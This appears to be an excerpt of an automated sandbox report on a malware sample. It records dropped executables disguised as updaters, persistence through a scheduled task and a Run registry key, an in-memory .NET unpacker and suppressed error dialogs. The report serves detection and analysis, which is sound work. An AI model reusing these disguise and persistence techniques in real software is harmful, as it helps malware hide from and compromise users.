Source:	Binary string: ntdll.pdbUGP source: rdha.exe, 00000005.00000003.1458189702.0000000003020000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1458377462.0000000003210000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1461869921.00000000051E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1461684888.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1613195494.0000000003080000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1613603143.0000000003270000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rdha.exe, 00000005.00000003.1458868669.00000000031C0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1458694145.0000000003020000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462129411.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462265373.0000000005190000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1614206122.0000000003080000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1614595814.0000000003220000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: my_new_hook_project.pdb source: readerupdate2.exe, 00000004.00000002.1441967825.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, readerupdate2.exe, 0000000E.00000002.1601865876.00000000030B1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: my_new_hook_project.pdb. source: readerupdate2.exe, 00000004.00000002.1441967825.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, readerupdate2.exe, 0000000E.00000002.1601865876.00000000030B1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: rdha.exe, 00000005.00000003.1459630648.0000000003020000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1459821006.0000000003240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462888323.0000000005210000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462640595.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1620431709.00000000032A0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1620149862.0000000003080000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: rdha.exe, 00000005.00000003.1459411737.00000000030A0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1459169276.0000000002810000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462490527.0000000005110000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462424813.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1619658698.0000000002840000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1619900415.0000000003100000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: 9ua5N7dcBZ.exe, 00000000.00000002.1324362118.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000001.00000002.1333508917.0000000000402000.00000002.00000001.01000000.00000006.sdmp, update.exe, 00000001.00000000.1322067460.0000000000402000.00000002.00000001.01000000.00000006.sdmp, Gxtuum.exe, 00000002.00000000.1329675124.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, Gxtuum.exe, 00000002.00000002.1336147979.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, Gxtuum.exe, 00000003.00000000.1344480910.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, readerupdate2.exe, 00000004.00000002.1441967825.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, rdha.exe, 00000005.00000000.1440085861.0000000000402000.00000002.00000001.01000000.0000000E.sdmp, rdha.exe, 00000005.00000002.1461357764.0000000000402000.00000002.00000001.01000000.0000000E.sdmp, readerupdate2.exe, 0000000E.00000002.1601865876.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, rdha.exe, 0000000F.00000002.1622749776.0000000000402000.00000002.00000001.01000000.0000000E.sdmp, rdha.exe, 0000000F.00000000.1599769656.0000000000402000.00000002.00000001.01000000.0000000E.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 18.3.svchost.exe.27dcbcbc070.0.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 18.3.svchost.exe.27dcbcbc070.0.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 18.3.svchost.exe.27dcbcbc070.2.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 18.3.svchost.exe.27dcbcbc070.2.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 18.3.svchost.exe.27dcbcbc070.1.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 18.3.svchost.exe.27dcbcbc070.1.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 18.3.svchost.exe.27dcbcbc070.3.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 18.3.svchost.exe.27dcbcbc070.3.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 21.3.svchost.exe.2449aabc070.1.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 21.3.svchost.exe.2449aabc070.1.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 21.3.svchost.exe.2449aabc070.2.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 21.3.svchost.exe.2449aabc070.2.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 21.3.svchost.exe.2449aabc070.0.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 21.3.svchost.exe.2449aabc070.0.raw.unpack, Runtime.cs	.Net Code: CoreMain
Source: 21.3.svchost.exe.2449aabc070.3.raw.unpack, Runtime.cs	.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 21.3.svchost.exe.2449aabc070.3.raw.unpack, Runtime.cs	.Net Code: CoreMain

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

Code function: 1_2_6D0C0EC0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,

1_2_6D0C0EC0

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Code function: 0_2_00007FF7C79600BD pushad ; iretd	0_2_00007FF7C79600C1
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_6D0DDB01 push ecx; ret	1_2_6D0DDB14
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_0089D1C8 push esp; retf	1_2_0089D1D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_008772EF pushad ; iretd	1_2_008772F0
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_0089D7C6 push esp; retf	1_2_0089D7C7
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Code function: 1_2_00889FC1 push ecx; ret	1_2_00889FD4
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_6C84DB01 push ecx; ret	2_2_6C84DB14
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_0088D1C8 push esp; retf	2_2_0088D1D0
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_008672EF pushad ; iretd	2_2_008672F0
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_0088D7C6 push esp; retf	2_2_0088D7C7
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Code function: 2_2_00879FC1 push ecx; ret	2_2_00879FD4
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Code function: 4_2_00007FF7C77500BD pushad ; iretd	4_2_00007FF7C77500C1
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_3_0055525D push es; ret	5_3_00555264
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_3_00552C39 push ecx; ret	5_3_00552C59
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_3_005510F9 push FFFFFF82h; iretd	5_3_005510FB
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_3_005544F9 push edx; retf	5_3_005544FC
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_3_005528EC push edi; ret	5_3_005528F8
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_3_00554D5E push esi; ret	5_3_00554D69
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_3_00550F6A push eax; ret	5_3_00550F75
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_3_00553FD4 push ss; retf	5_3_00553FF5
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_3_005521DC push eax; ret	5_3_005521DD
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_3_00553F89 push edi; iretd	5_3_00553F96
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_6C4FBB71 push ecx; ret	5_2_6C4FBB84
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_0055525D push es; ret	5_2_00555264
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_00552C39 push ecx; ret	5_2_00552C59
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_005510F9 push FFFFFF82h; iretd	5_2_005510FB
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_005544F9 push edx; retf	5_2_005544FC
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_005528EC push edi; ret	5_2_005528F8
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_00554D5E push esi; ret	5_2_00554D69
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_00550F6A push eax; ret	5_2_00550F75
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Code function: 5_2_00553FD4 push ss; retf	5_2_00553FF5

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\g2m.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\g2m.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File created: C:\Users\user\AppData\Local\Temp\3140a3c17c\g2m.dll	Jump to dropped file
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	File created: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	File created: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Jump to dropped file
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	File created: C:\Users\user\AppData\Roaming\Avt\goopdate.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\readerupdate2[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

File created: C:\Windows\Tasks\Gxtuum.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run readerupdate2.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run readerupdate2.exe			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe

Code function: 1_2_008890ED GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_008890ED

Source: C:\Program Files\Windows Media Player\wmpnscfg.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Program Files\Windows Media Player\wmpnscfg.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\dayzip CfgData

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process information set: NOOPENFILEERRORBOX
